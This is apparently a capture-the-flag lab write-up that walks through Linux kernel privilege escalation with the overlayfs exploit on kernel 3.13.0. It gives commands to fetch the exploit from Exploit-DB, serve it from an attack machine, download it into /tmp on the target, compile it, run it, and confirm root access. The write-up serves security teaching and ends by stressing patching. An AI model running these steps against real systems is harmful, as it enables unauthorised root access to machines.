Kernel Exploits

Step 1: SSH Login to the Target Machine

First, SSH into the target machine.

Step 2: Check the Kernel Version

Since we already know this is a kernel privilege escalation exploit, let's check the kernel version running on our target machine using the following command:

Step 3: Search for Exploits

Now that we have the kernel version, we can search in well-known exploit databases, such as Exploit Database.

Searching for Linux 3.13.0 yields the following results:

• Exploit Found: I found an exploit for the Linux Kernel versions 3.13.0 to < 3.19 (specifically for Ubuntu 12.04, 14.04, 14.10, and 15.04) related to 'overlayfs' Local Privilege Escalation.

Step 4: Review the Exploit Details

When we open this exploit, we can see the details and some instructions on how to use it.

Step 5: Download the Exploit

To make this exploit work, we need to download the raw content to the attack machine and then transfer it to the vulnerable machine. Choose a directory of your preference and use the wget command to download the exploit. For example:

wget https://www.exploit-db.com/raw/37292

Step 6: Rename the File and Start the HTTP Server

Next, rename the downloaded file to ofs.c, and start a simple HTTP server to transfer the file to the vulnerable machine:

python -m SimpleHTTPServer 8000

Step 7: Download the Exploit on the Vulnerable Machine

On the vulnerable machine, we must choose the /tmp directory for the download; otherwise, we will encounter a "Permission denied" message. Use the following command:

wget -O /tmp/ofs.c http://<attack_machine_IP>:8000/ofs.c

Breakdown of the Command

• wget: This is the command-line utility used for downloading files from the web.

• -O /tmp/ofs.c: The -O option specifies the output file name and path. In this case, it tells wget to save the downloaded file as ofs.c in the /tmp directory. The /tmp directory is often used for temporary files and is typically writable by all users.

• http://<attack_machine_IP>:8000/ofs.c: This is the URL from which you are downloading the file. It points to the file ofs.c being served by an HTTP server running on the machine with the IP address 10.10.242.118 on port 8000.

Step 8: Compile and Run the Exploit

Now, navigate to the /tmp directory and follow the instructions presented in the exploit. Compile the file and then run it:

gcc ofs.c -o ofs
./ofs

Step 9: Verify Privilege Escalation

After running the exploit, we can verify our privileges. Running the id command again shows that we are now 'root'. We can also use the whoami command to confirm this:

id
whoami

Step 10: Access the Flag

To retrieve the flag, navigate to the /home/matt directory and use cat to view the contents of the file:

If we had tried to use cat flag1.txt before the exploit, we would have received a "Permission denied" message.

With this write-up, we demonstrated the impact of having an outdated system. Having access to a user's credentials allowed us to leverage that privilege to gain access to the root account. This exercise highlights the importance of keeping systems updated and patched against known vulnerabilities, as well as the potential risks associated with running outdated software.